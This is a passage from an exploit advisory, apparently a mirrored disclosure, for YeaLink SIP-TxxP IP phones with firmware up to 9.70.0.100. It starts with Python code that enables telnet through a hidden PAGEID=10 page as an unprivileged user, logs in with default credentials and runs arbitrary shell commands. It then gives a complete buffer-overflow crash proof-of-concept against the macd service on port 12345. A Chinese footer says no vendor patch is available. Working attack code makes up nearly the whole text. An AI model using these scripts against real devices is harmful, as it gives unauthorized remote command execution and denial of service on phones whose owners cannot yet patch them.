passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, phoneUrl, webUser, webPass)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
post_params = urllib.urlencode([("PAGEID", "10"), ("CONFIG_DATA", "1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260")])
print "[*] Enable telnet on [ %s ] by posting directly to the hidden page with PAGEID=10 parameter as unprivileged user [ user ]" % phoneUrl
pagehandle = urllib2.urlopen(phoneUrl, post_params)
print "[*] Making telnet connection to [ %s ] with default user [ %s ] and password [ %s ]" % ( phoneIP, telnetUser, telnetPass )
tn = telnetlib.Telnet(phoneIP)
tn.read_until("IPPHONE login: ")
tn.write(telnetUser + "\n")
if telnetPass:
tn.read_until("Password: ")
tn.write(telnetPass + "\n")
tn.read_until("$")
print "[*] Executing shell command [ %s ]" % shellCmd
tn.write( shellCmd + '\n' )
tn.read_until( shellCmd )
print tn.read_until("$").strip("$ ")
tn.write("exit\n")
tn.read_all()
[0x04] - Remote "/yealink/bin/macd" buffer overflow crash PoC
The following PoC exploit will crash the "/yealink/bin/macd" process on port "12345"
#!/usr/bin/python
import socket,sys,time,struct
if len(sys.argv) < 2:
print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21"
print "[-] Usage: %s <target addr> " % sys.argv[0]
sys.exit(0)
target = sys.argv[1]
if len(sys.argv) > 2:
platform = sys.argv[2]
buffer = "\x41"*75
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((target,12345))
except:
print "[-] Connection to "+target+" failed!"
sys.exit(0)
print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21"
print "[*] Sending " + `len(buffer)` + " byte crash"
s.send(buffer + "\r\n")
s.recv(1024)
建议:
--------------------------------------------------------------------------------
厂商补丁:
yealink
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
?ProductsID=64&CateID=187&flag=142